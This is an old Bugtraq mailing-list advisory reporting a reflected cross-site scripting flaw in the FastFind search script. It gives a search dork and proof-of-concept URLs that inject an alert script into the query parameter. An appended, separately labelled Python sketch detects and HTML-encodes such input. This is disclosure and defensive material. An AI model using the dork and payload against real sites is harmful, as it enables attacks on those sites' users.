Message-ID: <20061007165602.4982.qmail@securityfocus.com>
Date: 7 Oct 2006 16:56:02 -0000
From: Dr.Ninux@...mail.com
To: bugtraq@...urityfocus.com
Subject: Sorry....My Message With Out Live Site....

XSS IN FastFind...

DORK: "Powered by FastFind - Search Engine Script"

Exploit:
http://[target]/[path]/index.php?query=<script>alert(1)</script>&type=simple

references:
http://www.interspire.com/fastfind/

Example:
http://www.target.com/fastfind/index.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&type=simple
http://www.target.com/search/index.php?query=<script>alert(1)</script>&type=simple
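
Added example, not part of the original post and not FastFind's own code: a Python sketch for defenders that checks request targets for tag-like markup in the `query` parameter named above, in both its raw and URL-encoded forms, and shows the HTML-encoded text a search page should echo back instead. The function names, the tag-matching regex and the sample request lines are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: "<" followed by a letter, "/" or "!" is treated as tag-like markup.
TAG_LIKE = re.compile(r"<[/!]?[a-zA-Z]")

# Constructed sample request targets, modelled on the URL shapes in the post.
SAMPLE_REQUESTS = [
    "/fastfind/index.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&type=simple",
    "/search/index.php?query=<script>alert(1)</script>&type=simple",
    "/search/index.php?query=blue+widgets&type=simple",
    "/search/index.php?query=a+%3C+b&type=simple",  # benign "<" in a search term
]


def query_values(target):
    """Return the percent-decoded values of the `query` parameter."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return params.get("query", [])


def is_markup_probe(target):
    """True if any decoded `query` value contains tag-like markup."""
    return any(TAG_LIKE.search(v) for v in query_values(target))


def safe_echo(value):
    """HTML-encode a value before it is written into the results page."""
    return html.escape(value, quote=True)


def triage(targets):
    """Return (target, encoded value) pairs for every flagged request."""
    hits = []
    for target in targets:
        for value in query_values(target):
            if TAG_LIKE.search(value):
                hits.append((target, safe_echo(value)))
    return hits


if __name__ == "__main__":
    for target, encoded in triage(SAMPLE_REQUESTS):
        print(f"flagged: {target}\n  safe echo: {encoded}")
```

Decoding before matching is what lets one rule cover both URL forms shown in the post; the encoding step is the actual fix, since detection alone does not stop the reflection.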